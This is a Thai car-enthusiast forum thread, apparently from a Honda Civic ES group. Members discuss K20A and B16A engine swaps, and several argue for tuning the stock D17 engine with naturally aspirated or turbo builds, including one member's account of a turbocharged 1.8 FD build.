คำตอบนี้ กระจ่างเลยน่ะวิทย์ ...... ^o^
ได้รับคำขอบคุณจาก: WIT_ES MANIA 
Lee_ES_turbo


เข้าร่วม: 02 ตุลา 2008
ตอบ: 4446

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8088
ให้คำขอบคุณ: 5249

ปี: 2004
จันทร์, 20 กันยา 2010 15:41 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
alit พิมพ์ว่า:
Lee_ES_turbo พิมพ์ว่า:
ไม่ลองเล่นเครื่องตัวนี้ให้สุดก่อนหรอคับ มีไรให้เล่นอีกเยอะนะคับ เครื่อง D17 ใน ES เราเนี่ย เล่น NA ที่อเมกาทำเต็มทำม้าสูดสุดได้ถึง 200 กว่าม้าลงพื้นเลยนะคับ แค่เปลี่ยนลูก ก้าน ชาฟ แคม สปริงวาร์ว รีเทนเนอร์ พูเล่อลูมิเนียม ล้างหน้าflywheel LSD ไม่ได้น้อยหน้าพวก B16 เลยนะคับ หรือเล่นแนว turbo ก่อมีให้เห็นอยู่เยอะเเยะ 400-500 ม้าทั้งนั้น ดีกว่าวางเครื่องแล้วไม่จบนะคับ ถ้าวางแล้วจบก่อดีคับ แต่อยากแนะนำเล่นเครื่อง D17 อ่ะคับ จิงๆนะ คิคิ

พี่ลี หาพวกโบเหมือนกันล่ะสิ อนาคตผมจะไปให้ได้เหมือนพี่ พี่เป็น Idol ของผมครับ


เรียกผมว่าน้องเถอะคับ อายุพี่มากกว่าผมสองหลักเลยนะคับ งิงิ
BeeBank


ชื่อเล่น: แบงค์

เข้าร่วม: 05 ธันวา 2009
ตอบ: 314

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 288
ให้คำขอบคุณ: 143

ปี: 2001
จันทร์, 20 กันยา 2010 15:45 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
มาเก็บข้อมูล.....
u5216381


เข้าร่วม: 13 มีนา 2010
ตอบ: 3

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 0
จันทร์, 20 กันยา 2010 18:01 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
แต่ใจจิงๆ ผมก้อตาม ที่คุน ลี ว่านะ ผมก้อเชียร์ เทอโบอีกเสียงจากที่ สัมผัสมา เทค โบ นี่มันสุดยอด เลยเหอๆท้าทำจบจะรู้สืกว่ามันคุ้มค่า มาก ผมเคยสัม ผัส k20 มาและ มานั่งคันนี้ ชอบฟิวตรง 2-5พันรอบ บูสมา เลยห้าพันรอบ เทคดันอีก พอนืกถาพออกไหม - -ก้อเกบไว้เปน อีกตัวเลือกที่ไม่ต้องกลัวอีกต่อไป อันนี้ อาจจะพอเป็นแนวทางสำหรับใครหลายๆ คนอิกนืงตัวเลือก ขออนุญาติลงรูปหน่อยละกัน อันนี้ FD 1.8 Turbo ครับอันนี้ รถพี่ ผมเองงทำไปจบๆ ใช่งานมาปีนืงได้และ ขับลงใต้มาแล้วด้วย ปันหา ก้อไม่เคยเจอ เคยเจอมากสุด ครัชลื่น และก้อตอนถ่ายนํ้ามันเครื่องมา เกือบไหม้เท่านั้นแหละ อันนี้ ก๊อป เมกามาเลย เสตปรถบ้านจ่าย ตลาด ที่มีม้า ติดตัว มาถืง 210 h pฟลายวิล นะ ลงล้อ 190 เปะ แต่ทำไปทำมาท๊อคนี่เยอะกว่าม้า อิก237 ไส้ในเดิม บูส.6 เทอโบ บอลแบลิ่ง ของ RB26 v spec และก้อมีของตุกติกเยอะพอสมควรเพื่อความเหนียวเพราะพี่แก ทีนหนัก แต่ผมไม่แน่ใจนะ ว่าพื้นฐาน FD ท้าเทียบ กะ D17 ตามความคิดผมไม่หน้าต่างกันมาก เท่าไหร่นะ ข้อมูลตามลิ้ง

http://rcw.ms/forums/showthread.php?733990-FD-Turbo-1.8-M-T-By-PB-Motor

เอาไว้เป็นแนวทางละกัน FD ทำได้ Es ก้อต้องทำได้ สิ - -
ได้รับคำขอบคุณจาก: bapil 
WIT_ES MANIA


เข้าร่วม: 01 ตุลา 2008
ตอบ: 865

Guru ES
Guru ES

ได้รับคำขอบคุณ: 887
ให้คำขอบคุณ: 327

ที่อยู่: ตลาดป่าโมก จ.อ่างทอง
อังคาร, 21 กันยา 2010 13:58 - ถามเรื่อง K20A กับ B16A วางใน ES หน่อยคับผม
ohm พิมพ์ว่า:
WIT_ES MANIA พิมพ์ว่า:
เครื่องเดิมดีที่สุดแล้วครับ

คำตอบนี้ กระจ่างเลยน่ะวิทย์ ...... ^o^


มันโดนกับตัวมาเยอะครับพี่โอมเลยรู้ อิอิ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.